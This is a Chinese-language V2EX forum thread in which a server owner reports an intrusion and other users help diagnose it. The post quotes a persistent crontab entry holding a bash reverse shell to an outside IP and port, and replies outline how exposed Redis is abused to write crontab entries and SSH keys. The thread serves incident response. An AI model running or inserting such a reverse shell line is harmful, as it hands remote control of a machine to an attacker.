服务器被入侵了,有懂的老铁帮忙看下,万分感谢

2020-12-22 22:29:04 +08:00
 bigbigeggs

crontab 的定时任务全部被清空,换成了 如下

"\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

删除之后,过几秒之后,又出现在了定时任务中了。

百度了下看起来像是 反弹 shell,可以看到你在服务器的任何行为。

现在不知道怎么解决,不知道哪个脚本在后台执行,一直写定时任务进去。

求有懂得老铁帮忙看下

4420 次点击
所在节点    问与答
47 条回复
bigbigeggs
2020-12-22 22:30:09 +08:00
cpu,内存看起来暂时正常。不知道入侵者想干什么
opengps
2020-12-22 22:41:11 +08:00
抓紧备份数据重装系统恢复业务。
人工清理病毒往往很难判断是否清理彻底,所以及时你清理了病毒也很难发现是否有其他隐患。
如果你想要研究病毒,打个系统镜像,拿到别处研究
opengps
2020-12-22 22:43:31 +08:00
那个 IP 直接浏览器访问 80 端口,发现是个类似于 OA 签到的东西,像是一种后门脚本。
那个 IP 的 8888 端口的站点直接访问提示不安全,看来有可能确实是某种防止滥用。
opengps
2020-12-22 22:46:02 +08:00
太神奇了,那个站点,有备案有作者,楼主确认下是不是正常的对外扩展功能吧。
bigbigeggs
2020-12-22 22:50:29 +08:00
@opengps 还没主意他的 ip 80 端口。感谢,已经把外网的所有端口都关掉了,直对内开放了。

暂时还没发现入侵者的意图,把项目恢复了,先排查下问题。
kaneg
2020-12-22 22:52:37 +08:00
是个反向 shell,你的 bash 的输入输出都被对方控制了。估计除了这一个定时任务还有其他的,你这边删了,另一个任务又把它重建出来了。
你这是哪种 Linux 系统?对外有暴露哪些端口和服务?
bigbigeggs
2020-12-22 23:06:51 +08:00
@kaneg centos7. 暴露公网的端口还挺多,redis,mysql,8080 这种比较常用的都有。但都有密码,所以没考虑那么多。

现在公网端口就留了几个必须用到的基础服务。
bigbigeggs
2020-12-22 23:07:21 +08:00
@kaneg 应该还有其他定时任务在执行,但就是找不到。也不知道想干嘛
zszhere
2020-12-22 23:14:34 +08:00
这就是个反弹 shell 啊 你在对方那已经上线了
如果没有可疑进程或者其他用户也没有 crontab 的话
检查下你的内核是不是被挂载了 rootkit 一般用这个来做持久化权限维持
然后检查下.ssh 目录有没有被写入公钥
zszhere
2020-12-22 23:15:19 +08:00
还有检查下 /etc/passwd 看有没有被新增用户或者被改掉密码
WordTian
2020-12-22 23:22:46 +08:00
我猜是 redis 对外开放造成的🐶
bigbigeggs
2020-12-22 23:22:52 +08:00
@zszhere .ssh 真有一条公钥,吓死我了,不知道什么时候写进去的,感谢老哥提醒。我还得在排查下其他的
bigbigeggs
2020-12-22 23:25:34 +08:00
@WordTian redis 是有对外开放的端口。但是端口不是常用的,并且有设置密码。是有项目在用 redis 塞数据,但 redis 是怎么做到 往 cront 里面写数据的? RDB 文件?
cheng6563
2020-12-22 23:34:21 +08:00
不用排查了,排不全的。直接备份数据格了吧
hakono
2020-12-22 23:59:51 +08:00
你那么多服务公开在外网,哪个服务有个安全漏洞不就中招了.......
caola
2020-12-23 00:05:28 +08:00
还不备份数据,就等删库跑路吧
WordTian
2020-12-23 00:07:37 +08:00
@bigbigeggs 对,rdb 文件,写公钥,覆盖 crontab 文件,常规操作了
yuelang85
2020-12-23 00:12:22 +08:00
@bigbigeggs redis 可以修改配置文件和保存配置文件的路径,这样就可以在 redis 中通过保存配置文件的方法在磁盘上写文件。
itabas016
2020-12-23 01:17:30 +08:00
服务器不就只应该暴露 ssh/http 端口吗?这是安全常识。
black11black
2020-12-23 06:00:17 +08:00
@WordTian 学习了,redis 对外开放还可能造成这种后果?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/738036

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX